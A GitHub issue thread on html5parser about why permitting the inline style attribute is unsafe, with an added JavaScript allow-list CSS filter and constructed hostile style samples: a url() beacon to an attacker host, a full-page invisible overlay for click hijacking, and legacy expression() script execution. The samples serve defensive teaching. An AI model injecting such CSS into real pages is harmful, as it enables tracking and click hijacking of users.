
allowing style attribute is not safe

Open · espretto opened this issue 2 years ago · 1 comment

CSS can be harmful and must be sanitized with e.g. cssfilter. It is not a safe default setting to allow the style attribute.

https://github.com/acrazing/html5parser/blob/cc95ffc4b50d99e64a477eb34934113f2d0ca3c4/src/safeHtml.ts#L95

espretto, Jul 29 '22 15:07
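The following is an added illustration of what "CSS can be harmful" means for a sanitizer that passes `style` through untouched. It is not code from html5parser, from cssfilter, or from either participant in this thread; the attacker-controlled style strings are constructed for the example, and the property allow-list and value grammar are deliberately minimal assumptions, not a recommendation of a complete policy.

```javascript
// Added example (not html5parser's or cssfilter's code): a tiny allow-list
// filter for inline `style` values, showing the kinds of CSS a sanitizer
// must reject if it permits the style attribute at all.
//
// Classes of harmful CSS illustrated by the constructed samples below:
//  - remote resource fetches via url(): lets the injected element phone home
//    (tracking, leaking that a page/comment was rendered) without any script
//  - overlay / UI redress: position:fixed plus a full-size, near-invisible
//    box covering the page captures clicks meant for the real UI
//  - legacy script-executing constructs: expression(), behavior: (old IE)

// Assumption: a small allow-list of presentational properties only.
const ALLOWED_PROPERTIES = new Set([
  'color', 'background-color', 'font-weight', 'font-style',
  'text-decoration', 'text-align', 'width', 'height',
]);

// Assumption: values may only be keywords, colours, lengths and percentages.
// Parentheses are excluded, so url(), expression(), calc() etc. never pass.
const SAFE_VALUE = /^[a-zA-Z0-9#%.\- ]+$/;

// Splits a style attribute into declarations, keeps those that satisfy both
// the property allow-list and the value grammar, and reports the rest with
// the reason they were dropped.
function filterStyle(style) {
  const kept = [];
  const dropped = [];
  for (const raw of style.split(';')) {
    const decl = raw.trim();
    if (!decl) continue;
    const colon = decl.indexOf(':');
    if (colon === -1) {
      dropped.push({ decl, reason: 'malformed declaration' });
      continue;
    }
    const property = decl.slice(0, colon).trim().toLowerCase();
    const value = decl.slice(colon + 1).trim();
    if (!ALLOWED_PROPERTIES.has(property)) {
      dropped.push({ decl, reason: `property "${property}" not on allow-list` });
      continue;
    }
    if (!SAFE_VALUE.test(value)) {
      dropped.push({ decl, reason: 'value uses functional notation or disallowed characters' });
      continue;
    }
    kept.push(`${property}: ${value}`);
  }
  return { kept: kept.join('; '), dropped };
}

// Constructed attacker-controlled style strings (not taken from the issue).
const SAMPLES = {
  benign: 'color: red; font-weight: bold',
  exfil: 'background: url(https://attacker.invalid/pixel?from=comment-42)',
  overlay: 'position: fixed; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.01',
  legacy: 'width: expression(alert(1)); behavior: url(#default#time2)',
};

// Runs every sample through the filter and returns the results keyed by name.
function runSamples() {
  const results = {};
  for (const [name, style] of Object.entries(SAMPLES)) {
    results[name] = filterStyle(style);
  }
  return results;
}

for (const [name, result] of Object.entries(runSamples())) {
  console.log(`${name}: kept="${result.kept}"`);
  for (const d of result.dropped) console.log(`  dropped "${d.decl}" (${d.reason})`);
}
```

Note that the `width: expression(...)` sample is dropped even though `width` itself is an allowed property: checking property names alone is not enough, the value grammar has to be constrained as well, which is the part a dedicated CSS filter handles.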

Can you explain specifically why CSS is not safe? Does it mean that it will lead to disordered page styles?

acrazing, Jul 11 '23 09:07